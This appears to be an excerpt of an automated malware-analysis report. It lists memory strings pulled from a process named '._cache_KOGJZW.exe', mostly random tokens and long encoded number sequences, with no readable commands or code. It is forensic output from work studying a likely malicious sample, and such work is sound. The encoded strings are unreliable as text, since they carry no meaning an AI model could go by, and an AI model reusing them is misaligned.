Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8fhel,	memstr_257d9ab2-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c6hj9xe4ax6gq	memstr_e7c586ba-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qv	memstr_7655fda3-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y	memstr_21402e41-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8i,-2e	memstr_8bf4abc5-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user:	memstr_9e4906d8-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fk	memstr_0c1fca60-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4cktoph	memstr_802f91c5-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u5je8iq8s>n	memstr_e33e2a16-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qll,~	memstr_59adc1b3-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fh	memstr_3a2e4689-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8ff	memstr_475d3de5-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u7kv0fh9u	memstr_8806ebc9-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s1vp2ax6sl6z	memstr_78ab74b4-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i5y	memstr_a1ad796a-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i6q	memstr_028af17e-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p9xe6so8hx0d	memstr_803971f6-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l5el4lu0w	memstr_e48dc614-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i0d	memstr_e59f26c8-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6zk	memstr_8c96160f-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730769m211730726m211730727m211730737m211730749m211730771m211730771m211730768m	memstr_04963e34-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730725m211730721m2117307358&	memstr_9335ccb8-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730726m211730730m211730738m211730691m211730704m211730691m211730703m211730695m211730710m211730695m211730704m211730705o	memstr_07020da4-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0m211730719+	memstr_aede724c-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730713m211730772m211730772m211730770m211730778m211730773m211730770m211730775m211730775m211730767m211730723m211730726m211730772m211730772m211730767m211730774m211730721m211730773m211730721m211730767m211730779m211730723m211730771m211730778m211730767m211730769m211730778m211730723m211730768m211730769m211730771m211730770m211730720m211730778m211730769m211730769m211730773m211730719+	memstr_46bd95d6-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730713m211730727m211730770m211730779m211730726m211730773m211730769m211730779m211730726m211730767m211730721m211730721m211730726m211730774m211730767m211730774m211730774m211730727m211730727m211730767m211730778m211730727m211730720m211730723m211730767m211730769m211730724m211730720m211730724m211730778m211730720m211730727m211730774m211730724m211730721m211730775m211730778m211730719+	memstr_4fa24c41-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730713m211730771m211730726m211730775m211730720m211730727m211730774m211730720m211730775m211730767m211730724m211730723m211730774m211730723m211730767m211730774m211730775m211730768m211730726m211730767m211730779m211730721m211730726m211730726m211730767m211730775m211730726m211730720m211730769m211730775m211730771m211730770m211730775m211730727m211730773m211730727m211730720m211730719k	memstr_46a809f0-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730705m211730710m211730704m211730711m211730689m211730710m211730777m211730702m211730701m211730700m211730693m211730754m211730746m211730777m211730702m211730701m211730700m211730693m211730754m211730747m211730777m211730695m211730700m211730694m211730705m211730710m211730704m211730711m211730689m211730710i	memstr_bb910cab-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730720m211730702m211730701m211730689m211730697m211730737m211730699m211730712m211730695m211730734m211730699m211730705m211730710211730s	memstr_ccd03067-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730729m211730695m211730715m211730734m211730695m211730700m211730693m211730710m211730698211730f	memstr_ae888a01-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695m211730721m211730720m21173072171l	memstr_1e91c6b8-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 695m211730705=	memstr_a35a1cf9-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730688m211730715m211730710m211730695m211730754m211730725m211730743m211730731m211730726m211730745m211730771m211730772m211730751m211730777m211730711m211730702m211730701m211730700m211730693m211730754m211730721m211730701m211730711m211730700m211730710m211730777m211730711m211730702m211730701m211730700m211730693m211730754m211730742m211730715m211730706m211730695m211730777m211730706m211730710m211730704m211730754m211730740m211730691m211730702m211730711m211730695m211730705	memstr_3ca43fad-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 695m21o	memstr_63b8d527-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730705	memstr_13fae1e3-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730711m211730699m211730700m211730710m211730754m211730740m211730695m211730704m211730705m211730699m211730701m211730700m211730777m211730706m211730710m211730704m211730754m211730721m211730691m211730702m211730702m211730688m211730691m211730689m211730697m211730777m211730688m211730701m211730701m211730702m211730754m211730732m211730701m211730742m211730698m211730704m211730695m211730691m211730694m211730777m211730688m211730701m211730701m211730702m211730754m211730732m211730701m211730721m211730701m211730694m211730695m211730689m211730705k	memstr_f10b4772-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l3db2vn5ke0b	memstr_31c1bdde-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8f	memstr_0549d3f9-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l2zq4pw9jj4l	memstr_89970419-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m1ev4zx4zw2y3	memstr_28c190e1-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y8	memstr_b607b851-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4il5ci8sa7n=	memstr_335bec28-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c"	memstr_39fb92d3-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y'	memstr_24b5f522-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f,	memstr_58b71859-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4vw0gy0zp8pq	memstr_8ac1f2ae-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n6ej9mm3ot7gv	memstr_69d3e03d-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c1ww9dr6ru1n[	memstr_f428035c-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c1v@	memstr_cd44a9bb-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ie	memstr_59a2dd7c-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f2sv3pt6wt	memstr_3b06c9ac-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c7pl3mw6d1ny	memstr_de37886e-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5aj0kv0r7g~	memstr_7d181cb5-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4qj6dy2wb8rc	memstr_002b08c4-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p9ke3qf1mf2lh	memstr_93f3dbcb-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l9wu6mv4y2l	memstr_6d655695-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o9gh4eg3dh8z	memstr_5dc813cc-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n2nl2rb3xa1v	memstr_5022de25-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e8wc2un0m	memstr_e99c6013-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n2os5er7j	memstr_ee5299a2-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 700m21}	memstr_ff2e4ad4-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730720m211730702m211730701m211730689m211730697m211730734m211730695m211730700m211730693m211730710m21173069871i	memstr_41ff1e96-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730688m211730715m211730710m211730695m211730754m211730721m211730734m211730737m211730731m211730726m211730745m211730771m211730772m211730751m211730777m211730688m211730715m211730710m211730695m211730754m211730724m211730701m211730704m211730703m211730691m211730710m211730731m211730726m211730745m211730771m211730772m211730751m211730777m211730706m211730710m211730704m211730754m211730721m211730701m211730694m211730695m211730689m211730732m211730691m211730703m211730695m211730777m211730706m211730710m211730704m211730754m211730726m211730702m211730702m211730732m211730691m211730703m211730695m211730777m211730706m211730710m211730704m211730754m211730724m211730701m211730704m211730703m211730691m211730710m211730726m211730695m211730705m211730689m211730777m211730706m211730710m211730704m211730754m211730724m211730699m211730702m211730695m211730727m211730714m211730710m211730777	memstr_032a0f43-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730711m211730702m211730701m211730700m211730693m211730754m211730726m211730691m211730710m211730691m211730771m211730777m211730711m211730705m211730698m211730701m211730704m211730710m211730754m211730726m211730691m211730710m211730691m211730768m211730777m211730711m211730705m211730698m211730701m211730704m211730710m211730754m211730726m211730691m211730710m211730691m211730769m211730777m211730688m211730715m211730710m211730695m211730754m211730726m211730691m211730710m211730691m211730774m211730745m211730778m21173075121u	memstr_afb10da4-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730721m211730698m211730691m211730699m211730700m211730699m211730700m211730693m211730735m211730701m211730694m211730695i	memstr_c6fd9b9c-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730723m211730702m211730693m211730701m211730704m211730699m211730710m211730698m211730703m211730732m211730691m211730703m211730695173071i	memstr_45ab3f7f-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730723m211730711m211730710m211730698m211730742m211730691m211730693m211730734m211730695m211730700m211730693m211730710m211730698173070i	memstr_5ad99b77-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730706m211730710m211730704m211730754m211730735m211730699m211730703m211730695m211730742m211730715m211730706m211730695m211730777m211730694m211730709m211730701m211730704m211730694m211730754m211730724m211730702m211730691m211730693m211730705m211730777m211730694m211730709m211730701m211730704m211730694m211730754m211730740m211730695m211730704m211730705m211730699m211730701m211730700m211730777m211730694m211730709m211730701m211730704m211730694m211730754m211730737m211730699m211730693m211730721m211730701m211730711m211730700m211730710m211730777m211730694m211730709m211730701m211730704m211730694m211730754m211730737m211730699m211730693m211730737m211730699m211730712m211730695m211730777m211730706m211730710m211730704m211730754m211730737m211730699m211730693m211730738m211730691m211730710m211730710m211730695m211730704m211730700m211730777m211730706m211730710m211730704m211730754m211730737m211730699m211730693m211730735m211730691m211730705m211730697	memstr_da01abf6-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730705m211730710m211730704m211730711m211730689m211730710m211730777m211730702m211730701m211730700m211730693m211730754m211730734m211730695m211730692m211730710m211730777m211730702m211730701m211730700m211730693m211730754m211730742m211730701m211730706m211730777m211730702m211730701m211730700m211730693m211730754m211730736m211730699m211730693m211730698m211730710m211730777m211730702m211730701m211730700m211730693m211730754m211730720m211730701m211730710m211730710m211730701m211730703m211730777m211730695m211730700m211730694m211730705m211730710m211730704m211730711m211730689m211730710k	memstr_2159d660-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e7zx5aa1x	memstr_9f06738f-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m4sf0wj3p	memstr_4dfa20a2-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6q	memstr_f9e31266-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i3s	memstr_ba008241-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c5y	memstr_e30229e0-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i4	memstr_65bc7581-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f9	memstr_ba19fd2d-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q>	memstr_8078b6c1-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f#	memstr_3c652a58-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f(	memstr_10f6f488-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c-	memstr_ecf28072-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ir	memstr_6e5dc1ba-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yw	memstr_e0178255-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y\	memstr_185b8b33-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5ya	memstr_7c230ae0-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qf	memstr_9318dd6b-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f7si1zm7gk3sk	memstr_3c9dc290-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fp	memstr_ffedace7-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c3yu	memstr_231f8704-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1iz	memstr_046df8cb-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8fd	memstr_92570420-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4ci	memstr_486eacbc-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1in	memstr_d33e3de0-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o1uz2cq9vy5u	memstr_b25eafbe-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l4yj5fa0q5y	memstr_6ba85fe6-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c1vn9hb7ip3y	memstr_9997c88f-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qk	memstr_bbb1dadd-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lobal	memstr_01b7617d-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730706m211730710m211730704v	memstr_894e72c5-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d2pw0ka1yf0z	memstr_777c15b9-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b5jq7pu4xn5j1dd7vf0ah	memstr_65e4e2f1-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n4uc2zs6t3uq7ej6hrj1lx8w	memstr_8fa0dd17-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730736m211730721m211730774	memstr_418fcffe-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d9yu0vb4c	memstr_7415aa7e-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b5jq7pu4xn5j5yg5ne7a	memstr_b44dcb45-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d9tu4pd9qg7i	memstr_be2306aa-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b5jq7pu4xn5j1xb9rx1a	memstr_f8ce90b1-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d0sk8tu6pu0g	memstr_9cbdcf63-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b5jq7pu4xn5j3yg8rx1j	memstr_50c7b94b-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d7zx6ek8bh9y.	memstr_a8509ca9-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730699m211730700m211730710r	memstr_95ea2630-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d8jb1hy3bp0km	memstr_7bd90040-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x8lv4hx1jg8b5jq7pu4xn5j2ad5dg1l	memstr_403ded20-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n4uc2zs6t3uq7ej6hsi4sd4ib8tu2o	memstr_c3fb5ed5-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d0aq1lw8lc4r	memstr_c462cb65-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4wm7nq4xz6w3wj0jv5d8ky1wy0yu2o	memstr_4074d4e7-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1iy	memstr_5ce6a678-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f^	memstr_5c5fcf3f-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fc	memstr_47b6d4ba-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fh	memstr_ee3770ca-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qm	memstr_f1d4805e-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yr	memstr_86200773-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6qw	memstr_418c4f5e-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y\|	memstr_43056aac-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v8ti3xh0oa	memstr_67b51132-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qf	memstr_2b75f6be-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yk	memstr_d89e8bb3-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p8ms5mn1y	memstr_8098f458-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q7ui8lg3he3y	memstr_35bf0849-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2596087839.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8f	memstr_ab9b8a12-d
